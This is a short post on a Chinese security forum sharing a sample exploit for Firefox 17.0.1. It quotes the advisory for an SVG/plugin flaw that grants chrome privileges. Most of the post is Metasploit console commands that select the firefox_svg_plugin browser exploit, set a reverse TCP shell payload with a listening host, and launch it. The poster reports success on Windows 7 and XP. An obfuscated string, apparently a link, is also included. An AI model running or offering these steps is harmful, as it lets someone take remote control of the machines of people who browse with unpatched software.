[分享]FireFox 17.0.1漏洞样本-二进制漏洞-看雪论坛-安全社区|非营利性质技术交流社区

[分享]FireFox 17.0.1漏洞样本

发表于: 2013-6-15 21:19 2555

[分享]FireFox 17.0.1漏洞样本

naidizekij 活跃值

2013-6-15 21:19

2555

1、漏洞描述：
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging improper interaction between plugin objects and SVG elements.
2、样本生成：
b1fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2W2N6r3q4K6M7r3I4G2K9i4c8Q4x3X3g2G2M7X3N6Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0r3k6i4S2H3L8r3!0A6N6q4)9J5c8X3#2#2L8s2c8A6i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3k6A6M7X3g2X3L8%4S2Q4y4h3k6K6N6X3N6Q4y4h3k6H3L8s2g2Y4K9h3^5`.
msf > use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > show payloads
msf exploit(firefox_svg_plugin) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(firefox_svg_plugin) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_svg_plugin) > exploit
3、测试环境
windows 7/xp均测试成功，此漏洞不用shellcode.

[培训]传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！

收藏・0

免费・0

支持